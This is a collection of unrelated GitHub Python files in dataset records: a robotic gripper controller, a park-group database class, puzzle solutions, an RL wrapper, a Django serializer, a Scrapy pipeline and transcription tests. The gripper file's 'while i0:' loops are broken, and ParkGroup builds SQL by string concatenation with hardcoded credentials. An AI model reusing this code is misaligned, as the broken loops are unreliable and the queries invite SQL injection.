i0:\n\t\t\tsp = self.servos[0].read_speed()\n\t\t\tprint( \"close (speed): \"+repr(sp))\n\t\t\ti += 1\n\t\t\ttime.sleep(self.pause)\n\n\t\tself.servos[0].disable_torque_mode()\n\t\tself.preventLoadError(0)\n\t\treturn True\n\n\tdef change_motor_min(self,index, val):\n\t\tif (index < 0 or index >= len(self.servos)):\n\t\t\tprint( \"[ERR] invalid motor index \"+repr(index))\n\t\telse:\n\t\t\tself.motorMin[0]=val\n\t\t\tself.motorMax[0]=val+self.max_close\n\t\t\tself.reset()\n\t\t\tprint( 'Index changed successfully...')\n\n\tdef close_wheel(self,amnt=0.5,speed=0.2):\t#closing through wheel mode\n\t\t#set torque output to max, use wheel speed to modulate closing force\n\t\tself.servos[0].disable_torque_mode()\n\t\tself.servos[0].init_cont_turn()\n\t\tself.servos[0].apply_speed(speed)\n\t\ttime.sleep(self.pause*2)\n\n\t\ti,sp = 0,1.\n\t\twhile i0:\n\t\t\tsp = self.servos[0].read_speed()\n\t\t\tprint( \"close (speed): \"+repr(sp))\n\t\t\ti += 1\n\t\t\ttime.sleep(self.pause)\n\n\t\tself.servos[0].kill_cont_turn()\n\t\tself.preventLoadError(0)\n\t\treturn True\n\n\tdef close(self,amnt=0.2):\t\t\t#closing through position mode and torque limit\n\t\t#set target position to furthest limit, but change servo torque limit\n\t\tself.servos[0].apply_max_torque(amnt)\n\t\ttime.sleep(self.pause)\n\t\tself.servos[0].move_to_encoder(self.servos[0].settings['max_encoder']-1)\n\t\ttime.sleep(self.pause)\n\n\t\ti,sp = 0,1.\n\t\twhile i0:\n\t\t\tsp = self.servos[0].read_speed()\n\t\t\tprint( \"close (speed): \"+repr(sp))\n\t\t\ti += 1\n\t\t\ttime.sleep(self.pause)\n\n\t\tself.preventLoadError(0)\n\t\tself.servos[0].apply_max_torque(self.max_torque)\n\t\treturn True\n\n\tdef release(self):\t\t\t\t\t#should work for all previous close cases\n\t\tself.servos[0].enable_torque_mode()\n\n\t\tself.servos[0].apply_torque(0.)\t\t\t#allow natural compliance to loosen grasp for tight grip cases\n\t\ttime.sleep(self.pause*2)\n\n\t\tself.servos[0].disable_torque_mode()\n\n\t\tself.servos[0].kill_cont_turn()\t\t\t#back to position mode\n\t\tself.servos[0].apply_speed(self.servo_speed)\t#check in case it was in wheel mode\n\t\tself.moveMotor(0,self.amnt_release)\n","repo_name":"grablab/openhand_node","sub_path":"src/openhand_node/hands.py","file_name":"hands.py","file_ext":"py","file_size_in_byte":29801,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"92"} +{"seq_id":"3427229334","text":"#!/usr/bin/python\r\n\r\nfrom DBAccess import DBAccess\r\nfrom Park import Park\r\n\r\nclass ParkGroup(DBAccess) :\r\n TABLENAME = 'parkgroup'\r\n \r\n def __init__(self, wherecursor) :\r\n super().__init__(ParkGroup.TABLENAME, wherecursor)\r\n\r\n @staticmethod\r\n def getParkGroups(wherecursor = '') :\r\n if type(wherecursor) == str :\r\n qry = \"SELECT * FROM \" + ParkGroup.TABLENAME\r\n if wherecursor != '' :\r\n qry += \" WHERE \" + wherecursor\r\n\r\n cursor = ParkGroup.connector.cursor()\r\n cursor.execute(qry)\r\n parkgroups = ParkGroup.getParkGroups(cursor)\r\n cursor.close()\r\n return parkgroups\r\n\r\n else : \r\n parkgroups = list()\r\n while True :\r\n parkgroup = ParkGroup(wherecursor)\r\n if parkgroup.isEmpty() :\r\n break\r\n parkgroups.append(parkgroup)\r\n return parkgroups\r\n\r\n @staticmethod\r\n def getParkGroupsByField(fieldname, fieldvalue) : \r\n where = fieldname + \" = '\" + str(fieldvalue) + \"'\"\r\n return ParkGroup.getParkGroups(where)\r\n\r\n def getParks(self) :\r\n return Park.getParksByField('parkgroupid', self.getAttr('id'))\r\n\r\n @staticmethod\r\n def insert(attrs) : \r\n id = super().insert(ParkGroup.TABLENAME, attrs)\r\n where = \"id = \" + id\r\n group = ParkGroup(where)\r\n return group\r\n\r\n\r\nif __name__ == '__main__' : \r\n ParkGroup.connect('192.168.0.19', 'concierge', 'concierge', 'concierge')\r\n\r\n parkgroups = ParkGroup.getParkGroups()\r\n for parkgroup in parkgroups : \r\n print('[TEST] name: [' + parkgroup.getAttr('name') + ']')\r\n\r\n parkgroup = ParkGroup.getParkGroupsByField('name', 'Walt Disney World Resort')[0]\r\n print('[TEST] short: [' + parkgroup.getAttr('short') + ']')\r\n parks = parkgroup.getParks()\r\n for park in parks : \r\n print('[TEST] name: [' + park.getAttr('name') + ']')\r\n\r\n\r\n","repo_name":"fabiomazzarino/scrapinghub","sub_path":"ParkGroup.py","file_name":"ParkGroup.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"38379857313","text":"import tensorflow as tf\n\n# sess and global step\nsess_config = tf.ConfigProto()\n# 百分比\nsess_config.gpu_options.per_process_gpu_memory_fraction = 0.4\n# 动态\nsess_config.gpu_options.allow_growth = True\nsess = tf.Session(config=sess_config)\nglobal_steps = tf.Variable(0, trainable=False)\n\n# env.\nimport os\n\n# set GPU\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n# about log\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '0' # 默认值,打印所有信息\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '1' # 屏蔽INFO信息\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # 屏蔽INFO与WARNING信息\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # 屏蔽INFO, WARING, ERROR信息\n\n# pycharm2shell\nimport sys\nsys.path.append('../')\n","repo_name":"KirinNg/Machine_Learning_Tools_Code_TF","sub_path":"code_for_buildup_training/sess&env.py","file_name":"sess&env.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"92"} +{"seq_id":"40747713596","text":"import numpy as np\n\n\nclass IndexFinder:\n\n def __init__(self, min_idx, max_idx, priority):\n self.min_idx = int(min_idx)\n self.max_idx = int(max_idx)\n self.idx = int(max_idx / 2)\n self.priority = priority\n\n def next_search_idx(self, n_boards):\n if self.priority == \"first\":\n return self._idx_towards_first(n_boards)\n elif self.priority == \"last\":\n return self._idx_towards_last(n_boards)\n\n def _idx_towards_first(self, n_boards):\n if n_boards > 1:\n self.max_idx = self.idx\n self.idx = self.idx - int((self.idx - self.min_idx) / 2)\n else:\n self.min_idx = self.idx\n self.idx = self.idx + int((self.max_idx - self.idx) / 2)\n return self.idx\n\n def _idx_towards_last(self, n_boards):\n if n_boards > 0:\n self.min_idx = self.idx\n self.idx = self.idx + int((self.max_idx - self.idx) / 2)\n else:\n self.max_idx = self.idx\n self.idx = self.idx - int((self.idx - self.min_idx) / 2)\n return self.idx\n\n\ndef get_first_board(numbers, boards, board_size):\n potential_boards = boards\n idx_finder = IndexFinder(0, numbers.shape[0], \"first\")\n idx = idx_finder.idx\n while potential_boards.shape[0] != 1:\n bingo_boards = has_bingo(potential_boards, numbers[:idx], board_size)\n potential_boards = potential_boards[bingo_boards]\n idx = idx_finder.next_search_idx(potential_boards.shape[0])\n return {\"board\": potential_boards,\n \"idx\": idx}\n\n\ndef get_last_board(numbers, boards, board_size):\n potential_boards = boards\n idx_finder = IndexFinder(0, numbers.shape[0], \"last\")\n idx = idx_finder.idx\n while potential_boards.shape[0] != 1:\n bingo_boards = has_bingo(boards, numbers[:idx], board_size)\n potential_boards = boards[~bingo_boards]\n idx = idx_finder.next_search_idx(potential_boards.shape[0])\n return {\"board\": potential_boards,\n \"idx\": idx}\n\n\ndef has_bingo(boards, numbers, board_size):\n # Check which boards have bingo\n has_numbers = np.isin(boards, numbers)\n bingo_axis_1 = np.sum(np.sum(has_numbers, axis=1) >= board_size, axis=1)\n bingo_axis_2 = np.sum(np.sum(has_numbers, axis=2) >= board_size, axis=1)\n bingo_boards = np.logical_or(bingo_axis_1, bingo_axis_2)\n return bingo_boards\n\n\ndef get_bingo_number_idx(numbers, potential_boards, idx, board_size):\n # Find marked numbers in the final board\n matching_numbers = np.isin(potential_boards, numbers[:idx])\n bingo_col = np.sum(matching_numbers, 1) == board_size\n bingo_row = np.sum(matching_numbers, 2) == board_size\n\n # Extract the numbers in the bingo line\n if np.sum(bingo_col):\n bingo_numbers = potential_boards[0, :, bingo_col[0]]\n else:\n bingo_numbers = potential_boards[0, bingo_row[0], :]\n\n # Find when the numbers in the bingo line were called and pick the last\n called_idxs = np.argwhere(np.isin(numbers[:idx], bingo_numbers[0]))\n return np.max(called_idxs)\n\n\ndef get_score(numbers, last_board, bingo_number_idx):\n last_called = numbers[bingo_number_idx]\n uncalled = ~np.isin(last_board, numbers[:bingo_number_idx + 1])\n total_uncalled = np.sum(last_board[uncalled])\n return last_called * total_uncalled\n\n\nif __name__ == \"__main__\":\n # Read data\n numbers = np.loadtxt(\"data/day4_numbers.txt\", dtype=np.int_, delimiter=\",\")\n boards = np.loadtxt(\"data/day4_boards.txt\", dtype=np.int_)\n\n # Board info\n board_size = boards.shape[1]\n\n # Rearrange data\n boards = np.array(np.split(boards, int(boards.shape[0] / board_size)))\n\n # Part 1\n first_board = get_first_board(numbers, boards, board_size)\n bingo_number_idx = get_bingo_number_idx(numbers, first_board[\"board\"],\n first_board[\"idx\"], board_size)\n print(get_score(numbers, first_board[\"board\"], bingo_number_idx))\n\n # Part 2\n last_board = get_last_board(numbers, boards, board_size)\n bingo_number_idx = get_bingo_number_idx(numbers, last_board[\"board\"],\n last_board[\"idx\"], board_size)\n print(get_score(numbers, last_board[\"board\"], bingo_number_idx))\n","repo_name":"the-freja/AdventOfCode2021","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4451557123","text":"import math\n\ndef euler63():\n \n total = 0 \n \n \n for currN in range(1,22):\n for currP in range(1,10):\n currPowered = (int(math.pow(currP,currN)))\n if(len(str(currPowered))==currN):\n total+=1\n \n print(total)\n \n \n \n \n\neuler63()","repo_name":"msimmara/NoSpeulers","sub_path":"Euler/euler63.py","file_name":"euler63.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40984498058","text":"\"\"\" Implements an action recording wrapper. \"\"\"\nfrom typing import Dict, Any, Tuple, Optional, Union\n\nfrom pathlib import Path\n\nfrom maze.core.annotations import override\nfrom maze.core.env.core_env import CoreEnv\nfrom maze.core.env.maze_action import MazeActionType\nfrom maze.core.env.maze_env import MazeEnv\nfrom maze.core.env.maze_state import MazeStateType\nfrom maze.core.trajectory_recording.records.action_record import ActionRecord\nfrom maze.core.wrappers.wrapper import ObservationWrapper, Wrapper\n\n\nclass ActionRecordingWrapper(Wrapper[MazeEnv]):\n \"\"\"An Action Recording Wrapper that records for (sub-)step the respective MazeAction or agent action taken.\n\n :param env: Environment to wrap.\n :param record_maze_actions: If True maze action objects are recorded.\n :param record_actions: If True agent actions are recorded.\n :param output_dir: Path where to store the action records.\n \"\"\"\n\n def __init__(self, env: MazeEnv, record_maze_actions: bool, record_actions: bool,\n output_dir: str = 'action_records'):\n super().__init__(env)\n self.record_maze_actions = record_maze_actions\n self.record_actions = record_actions\n\n self.action_record = None\n self._episode_id = None\n self._current_seed = None\n self._cum_reward = None\n\n self.output_dir = Path(output_dir)\n self.output_dir.mkdir(parents=True, exist_ok=True)\n\n @override(ObservationWrapper)\n def step(self, action) -> Tuple[Any, Any, bool, Dict[Any, Any]]:\n \"\"\"Intercept ``ObservationWrapper.step`` and map observation.\"\"\"\n\n # get current actor id\n actor_id = self.env.actor_id()\n curr_env_time = self.env.get_env_time()\n\n # take actual step\n observation, reward, done, info = self.env.step(action)\n self._cum_reward += reward\n\n # record action taken\n last_action = self.env.get_maze_action()\n if self.record_maze_actions:\n self.action_record.set_maze_action(curr_env_time, maze_action=last_action)\n\n if self.record_actions:\n self.action_record.set_agent_action(curr_env_time, actor_id=actor_id, action=action)\n\n return observation, reward, done, info\n\n @override(CoreEnv)\n def seed(self, seed: int) -> None:\n \"\"\"Sets the seed for this environment's random number generator(s).\n\n :param: seed: the seed integer initializing the random number generator.\n \"\"\"\n self._current_seed = seed\n self.env.seed(seed)\n\n @override(ObservationWrapper)\n def reset(self) -> Any:\n \"\"\"Intercept ``ObservationWrapper.reset`` and map observation.\"\"\"\n\n # make sure that the episode is seeded properly\n assert self._current_seed is not None\n\n # dump previous trajectory\n self.dump()\n\n self.action_record = ActionRecord(seed=self._current_seed)\n obs = self.env.reset()\n self._cum_reward = 0.0\n\n self._episode_id = self.env.get_episode_id()\n\n # clear seed to make sure that the next episode is again seeded properly\n self._current_seed = None\n\n return obs\n\n def dump(self) -> None:\n \"\"\"Dump recorded trajectory to file.\n \"\"\"\n output_path = self.output_dir / f\"{self._episode_id}.pkl\"\n if self.action_record is not None:\n # set cumulative reward\n self.action_record.cum_action_record_reward = self._cum_reward\n # dump record\n self.action_record.dump(output_path)\n\n def clone_from(self, env: 'ActionRecordingWrapper') -> None:\n \"\"\"Reset this gym environment to the given state by creating a deep copy of the `env.state` instance variable\"\"\"\n raise RuntimeError(\"Cloning the 'ActionRecordingWrapper' is not supported.\")\n\n def get_observation_and_action_dicts(self, maze_state: Optional[MazeStateType],\n maze_action: Optional[MazeActionType], first_step_in_episode: bool) \\\n -> Tuple[Optional[Dict[Union[int, str], Any]], Optional[Dict[Union[int, str], Any]]]:\n raise NotImplementedError\n","repo_name":"enlite-ai/maze","sub_path":"maze/core/wrappers/action_recording_wrapper.py","file_name":"action_recording_wrapper.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"92"} +{"seq_id":"74346465578","text":"# -*- encoding: utf-8 -*-\n\nimport json\nfrom datetime import date, datetime\nfrom django.conf import settings\n\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import serializers\nfrom rest_framework.reverse import reverse\n\nfrom .models import Build, Job\n\nUser = get_user_model()\n\n\nclass JobSerializer(serializers.ModelSerializer):\n links = serializers.SerializerMethodField()\n violation_info = serializers.SerializerMethodField()\n\n class Meta:\n model = Job\n fields = ('id', 'name', 'description',\n 'svn_url', 'svn_username', 'svn_password',\n 'recipient', 'violation_threshold_num', 'links', 'violation_info')\n\n def get_violation_info(self, obj):\n last_builds = obj.builds.order_by('-number')[:1]\n violation_info = {\n \"violation_file_num\": -1,\n 'violation_num': -1,\n 'created': '0-0-0 0:0:0',\n 'health_url': '/static/img/rain.png',\n 'report_url': ''\n }\n if not last_builds:\n return violation_info\n last_build = last_builds[0]\n build_info = json.loads(last_build.result)\n\n violation_info = build_info['violation_info']\n if violation_info['violation_num'] >= obj.violation_threshold_num:\n health_url = '/static/img/rain.png'\n else:\n health_url = '/static/img/sun.png'\n\n violation_info.update({\n 'created': build_info['datetime'],\n 'health_url': health_url,\n 'report_url': settings.JENKINS_URL + '/job/{job_name}/violations/'.format(job_name=obj.name)\n })\n\n return violation_info\n\n def get_links(self, obj):\n request = self.context['request']\n return {\n 'self': reverse('job-detail', kwargs={'pk': obj.pk}, request=request)\n }\n\n\nclass BuildSerializer(serializers.ModelSerializer):\n links = serializers.SerializerMethodField()\n\n class Meta:\n model = Build\n fields = ('id', 'number', 'created', 'job', 'result', 'links')\n\n def get_links(self, obj):\n request = self.context['request']\n links = {\n 'self': reverse('build-detail', kwargs={'pk': obj.pk}, request=request),\n 'job': None,\n }\n # 注意: 这里用的是sprint_id, assigned用的是 obj.assigned.\n if obj.job:\n links['job'] = reverse(\n 'job-detail', kwargs={'pk': obj.job_id}, request=request)\n\n return links\n\n def validate(self, attrs):\n return attrs\n","repo_name":"510908220/python-code-check","sub_path":"src/app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"25180667359","text":"import re\nimport sys\n\nclass VM(object):\n def __init__(self, mem):\n self.acc = 0\n self.pc = 0\n self.mem = mem\n\n @staticmethod\n def parse_instruction(i):\n opcode, sgn, arg = re.match(r'(.*) ([+\\-])(\\d+)', i).groups()\n return opcode, 1 if sgn == '+' else -1, int(arg)\n \n def execute(self):\n opcode, sgn, arg = self.mem[self.pc]\n print(\"Executing\", opcode, '+' if sgn > 0 else '-', arg, \"(\", self.acc, self.pc, \")\")\n if opcode == 'acc':\n self.acc += sgn * arg\n self.pc += 1\n elif opcode == 'jmp':\n self.pc += sgn * arg\n else:\n self.pc += 1\n\nM = []\nfor line in sys.stdin:\n M.append(VM.parse_instruction(line.strip()))\n\nvm = VM(M)\nstates = set()\nwhile True:\n if vm.pc in states:\n print(\"EXIT\", vm.acc)\n sys.exit(0)\n states.add(vm.pc)\n vm.execute()\n","repo_name":"apetresc/contests","sub_path":"adventofcode/2020/8/8a.py","file_name":"8a.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"43246142552","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport pymongo\nfrom tutorial import settings\n\n\nclass TutorialPipeline(object):\n\n def __init__(self):\n self.client = pymongo.MongoClient(host=settings.MONGO_HOST, port=settings.MONGO_PORT)\n self.db = self.client[settings.MONGO_DB]\n self.coll = self.db[settings.MONGO_COLL]\n\n def process_item(self, item, spider):\n post_item = dict(item)\n re = self.coll.find_one(post_item)\n if re is None:\n self.coll.insert(post_item)\n return \"[%s] info save success!\" % post_item['name']\n else:\n return \"[%s] 已经存在!\" % post_item['name']\n\n","repo_name":"shell-collection/58guakao-crawler","sub_path":"tutorial/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"74715034858","text":"#!/opt/homebrew/bin/python3\n\nimport itertools\n\n\ndef combinations(l1, l2):\n for i in range(len(l1)):\n for j in range(len(l2)):\n yield (l1[i], l2[j])\n\n\ndeck1 = [['A', [1, 2, 5, 6, 7, 9, 10, 11, 14, 15, 16, 18]],\n ['B', [1, 3, 4, 5, 8, 9, 10, 12, 13, 14, 17, 18]],\n ['C', [2, 3, 4, 6, 7, 8, 11, 12, 13, 15, 16, 17]]]\n\ndeck2 = [['D', [1, 4, 9, 12, 14, 17, 19, 22, 27, 30, 32, 35]],\n ['E', [2, 5, 7, 10, 15, 18, 20, 23, 25, 28, 33, 36]],\n ['F', [3, 6, 8, 11, 13, 16, 21, 24, 26, 29, 31, 34]]]\n\nfor deck in [deck1, deck2]:\n stats = {}\n for first, second in itertools.combinations(deck, 2):\n first_name = first[0]\n second_name = second[0]\n combo = first_name + second_name\n\n # init stats for this particular combo\n stats[combo] = {}\n stats[combo]['win'] = 0\n stats[combo]['lose'] = 0\n stats[combo]['tie'] = 0\n stats[combo]['total'] = 0\n\n for a, b in combinations(first[1], second[1]):\n if a > b:\n stats[combo]['win'] += 1\n elif a == b:\n stats[combo]['tie'] += 1\n else:\n stats[combo]['lose'] += 1\n stats[combo]['total'] += 1\n \n\n print(stats)\n","repo_name":"kaveman909/games","sub_path":"intransitive.py","file_name":"intransitive.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"30091528672","text":"from loguru import logger\nfrom smatter import transx\nfrom faster_whisper.transcribe import Segment\nfrom libs.vad.utils_vad import VADIterator\nfrom pytest_mock import MockerFixture\nimport io\nimport numpy as np\nimport pytest\nimport string\nimport multiprocessing as mp\n\n\ndef generate_txdata(text) -> transx.TransXData:\n return {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.1,\n \"noise_probability\": 0.2,\n \"compression_ratio\": 0.3,\n \"text\": text.strip()\n }\n\n@pytest.mark.parametrize(\n \"base_start, start, end, text, prob, noise, comp\",\n [\n (5.0, 0.423, 0.555, \"Hello everyone!\", -0.522878745280338, 0.1, 1.2),\n (10.4, 0.0, 1.0, \"Were you listening to me?\", -0.154901959985743, 0.1, 1.5),\n (123.12, 4.99, 5.94, \"That's the plan for today.\", -0.638272163982407, 0.1, 0.8),\n (1423.1, 12.9, 13, \"That doesn't really make sense...\", -3.88605664769316, 0.7, 3.2),\n ]\n)\ndef test_segment_to_txdata(base_start, start, end, text, prob, noise, comp):\n s = Segment(\n 1,\n 16430,\n start,\n end,\n text,\n [15496, 11075, 0],\n 0.0,\n prob,\n comp,\n noise,\n None,\n )\n result = transx.segment_to_txdata(s, base_start)\n assert result == {\n \"start\": base_start + start,\n \"end\": base_start + end,\n \"probability\": np.exp(prob),\n \"noise_probability\": noise,\n \"compression_ratio\": comp,\n \"text\": text.strip()\n }\n\n@pytest.mark.parametrize(\n \"input, output, fixed\",\n [\n (\"That's crazy, that's crazy, that's crazy, that's crazy, that's crazy, that's crazy!\",\n \"That's crazy, that's crazy, that's crazy[...]\",\n True),\n (\"Honestly I don't know what to say, I don't know what to say, I don't know what to say, I don't know what to say, I don't know what to say.\",\n \"Honestly I don't know what to say, I don't know what to say, I don't know what to say[...]\",\n True),\n (\"There might be something in here? Oh no! oh no! oh no! oh no! oh no! oh no! Run!\",\n \"There might be something in here? Oh no! oh no! oh no! oh no! oh no! oh no! Run!\",\n False),\n (\"There might be something in here? Oh no! oh no! oh no! oh no! oh no! oh no!\",\n \"There might be something in here? Oh no! oh no! oh no![...]\",\n True),\n (\"If there's a point to this, perhaps it could be... I don't know if there's a point to this? Do you think there's a point to this? I don't think there's a point to this.\",\n \"If there's a point to this, perhaps it could be... I don't know if there's a point to this? Do you think there's a point to this? I don't think there's a point to this.\",\n False), \n ],\n)\ndef text_fix_repeated_phrases(input, output, fixed):\n result = transx.fix_repeated_phrases(input)\n assert result == (output, fixed)\n\n@pytest.mark.parametrize(\n \"input, output, fixed\",\n [\n (\"Hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha\",\n \"Hahahahahahaha[...]\",\n True),\n (\"Nonononononononono\",\n \"Nonononononono[...]\",\n True),\n (\"That looks amazing! Wowowowowowowowowowowowowowowowowow\",\n \"That looks amazing! Wowowowowowow[...]\",\n True), \n (\"HAHAHAHAHAHAHA\",\n \"HAHAHAHAHAHA[...]\",\n True),\n (\"HAHAHAHAHAHA\",\n \"HAHAHAHAHAHA\",\n True),\n (\"HAHAHAHAHA\",\n \"HAHAHAHAHA\",\n False),\n (\"HA HA HA HA HA HA HA\",\n \"HA HA HA HA HA HA HA\",\n False)\n ],\n)\ndef test_fix_repeated_sounds(input, output, fixed):\n result = transx.fix_repeated_sounds(input)\n assert result == (output, fixed)\n\n@pytest.mark.parametrize(\n \"input, size, first\",\n [\n ([\n \"Bye! Bye!\",\n \"Hello!\",\n \"Thanks for watching my last video\"\n ],\n 2,\n \"Hello!\"),\n ([\n \"Goodbye!\",\n \"please subscribe to my channel\",\n \"SEE YOU IN THE NEXT VIDEO?\"\n ],\n 1,\n \"Goodbye!\"), \n ],\n)\ndef test_filter_gigo_results(input, size, first):\n tx_data = list(map(lambda x: generate_txdata(x), input))\n test_gigo_phrases = list(map(lambda x: x.translate(str.maketrans('', '', string.punctuation)).casefold(), [\n 'Bye Bye',\n 'Please subscribe to my channel',\n 'Thanks for watching',\n 'See you in the next video'\n ]))\n result = transx.filter_gigo_results(tx_data, test_gigo_phrases)\n assert len(result) == size\n assert result[0][\"text\"] == first\n\n@pytest.mark.parametrize(\n \"input, output, vtt\",\n [\n (1.0, \"00:00:01,000\", False),\n (61.0, \"00:01:01,000\", False),\n (2.123456789, \"00:00:02,123\", False),\n (86399.999, \"23:59:59,999\", False),\n (1.3, \"00:00:01.300\", True),\n (543.5678, \"00:09:03.567\", True) \n ],\n)\ndef test_seconds_to_timestamp(input, output, vtt):\n result = transx.seconds_to_timestamp(input, vtt)\n assert result == output\n\ndef test_transx_to_string(monkeypatch):\n monkeypatch.setattr(transx, \"fix_repeated_phrases\", lambda x: (x, True))\n monkeypatch.setattr(transx, \"fix_repeated_sounds\", lambda x: (x, True))\n tx: transx.TransXData = {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.9,\n \"noise_probability\": 0.1,\n \"compression_ratio\": 1.0,\n \"text\": 'Sample text'\n }\n result = transx.transx_to_string(tx)\n assert result == '[---]: Sample text'\n\n tx1: transx.TransXData = {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.4,\n \"noise_probability\": 0.6,\n \"compression_ratio\": 2.1,\n \"text\": 'Sample text'\n }\n result1 = transx.transx_to_string(tx1)\n assert result1 == '[???]: Sample text'\n\n tx2: transx.TransXData = {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.2,\n \"noise_probability\": 0.9,\n \"compression_ratio\": 3.2,\n \"text\": 'Sample text'\n }\n result2 = transx.transx_to_string(tx2)\n assert result2 == '[!!!]: Sample text'\n \ndef test_txdata_to_srt(monkeypatch):\n monkeypatch.setattr(transx, \"seconds_to_timestamp\", lambda x, y: \"00:00:01,000\" if not y else \"00:00:01.000\")\n monkeypatch.setattr(transx, \"transx_to_string\", lambda x: '[---]: Sample text')\n tx: transx.TransXData = {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.9,\n \"noise_probability\": 0.1,\n \"compression_ratio\": 1.0,\n \"text\": 'Sample text'\n }\n result = transx.txdata_to_srt(tx, 1, False)\n assert result == '1\\n00:00:01,000 --> 00:00:01,000\\n[---]: Sample text\\n\\n'\n result1 = transx.txdata_to_srt(tx, 1, True)\n assert result1 == '1\\n00:00:01.000 --> 00:00:01.000\\n[---]: Sample text\\n\\n'\n\ndef test_join_similar():\n tx1: transx.TransXData = {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.1,\n \"noise_probability\": 0.2,\n \"compression_ratio\": 0.3,\n \"text\": 'Sample text'\n }\n tx2: transx.TransXData = {\n \"start\": 1.0,\n \"end\": 2.0,\n \"probability\": 0.1,\n \"noise_probability\": 0.2,\n \"compression_ratio\": 0.3,\n \"text\": 'Sample text'\n }\n tx3: transx.TransXData = {\n \"start\": 3.0,\n \"end\": 4.0,\n \"probability\": 0.9,\n \"noise_probability\": 0.3,\n \"compression_ratio\": 1.0,\n \"text\": 'More sample text'\n }\n tx4: transx.TransXData = {\n \"start\": 5.0,\n \"end\": 6.0,\n \"probability\": 0.5,\n \"noise_probability\": 0.1,\n \"compression_ratio\": 2.0,\n \"text\": 'More sample text'\n }\n result = transx.join_similar([tx1, tx2, tx3, tx4])\n assert len(result) == 2\n assert result[0][\"text\"] == 'Sample text'\n assert result[0][\"start\"] == 1.0\n assert result[0][\"end\"] == 2.0\n assert result[0][\"probability\"] == 0.1\n assert result[0][\"noise_probability\"] == 0.2\n assert result[0][\"compression_ratio\"] == 0.3\n assert result[1][\"text\"] == 'More sample text'\n assert result[1][\"start\"] == 3.0\n assert result[1][\"end\"] == 6.0\n assert result[1][\"probability\"] == 0.9\n assert result[1][\"noise_probability\"] == 0.3\n assert result[1][\"compression_ratio\"] == 2.0\n\nclass MockProcess:\n _inbytes = b'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f'\n stdout = io.BytesIO(_inbytes)\n\n#Testing transx.chunk_from_samples()\ndef text_chunk_from_samples():\n mock_process = MockProcess()\n chunk_gen = transx.chunk_from_samples(mp.Event(), logger, mock_process, 2) #type: ignore\n result = np.zeros(0, np.float32)\n for c in chunk_gen:\n assert isinstance(c, np.ndarray)\n assert c.dtype == np.float32\n assert c.shape == (2,)\n result += c\n assert result == np.array([0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 11.0, 12.0, 13.0, 14.0, 15.0])\n\ndef test_vad_samples(mocker: MockerFixture):\n count = 0\n def pretend_vad(self, x, return_seconds=False):\n nonlocal count\n assert x.shape == (2,)\n assert x.dtype == np.float32\n assert x.all() == np.array([-12.3, 4.9], np.float32).all()\n count += 1\n if count == 2:\n return {'start': 3}\n elif count == 3:\n return {'end': 6}\n else:\n return None\n\n mocker.patch('libs.vad.utils_vad.VADIterator.reset_states')\n mocker.patch('libs.vad.utils_vad.VADIterator.__call__', pretend_vad)\n chunk_size = 2\n max_size = 10\n start = 0\n blanks = mp.Queue()\n def chunk_gen():\n for x in range(1, 10):\n yield np.array([-12.3, 4.9], np.float32)\n\n vad = transx.vad_samples(logger, chunk_gen(), chunk_size, max_size, start, blanks)\n first_start, first = vad.__next__()\n assert first_start == 3\n assert first.all() == np.array([-12.3, 4.9, -12.3, 4.9, -12.3, 4.9], np.float32).all()\n\n with pytest.raises(StopIteration):\n vad.__next__()\n\ndef test_vad_samples_maxed(mocker: MockerFixture):\n count = 0\n def pretend_vad(self, x, return_seconds=False):\n nonlocal count\n assert x.shape == (2,)\n assert x.dtype == np.float32\n assert x.all() == np.array([-12.3, 4.9], np.float32).all()\n count += 1\n if count == 1:\n return {'start': 1}\n else:\n return None\n\n mocker.patch('libs.vad.utils_vad.VADIterator.reset_states')\n mocker.patch('libs.vad.utils_vad.VADIterator.__call__', pretend_vad)\n chunk_size = 2\n max_size = 10\n start = 0\n blanks = mp.Queue()\n def chunk_gen():\n for x in range(1, 10):\n yield np.array([-12.3, 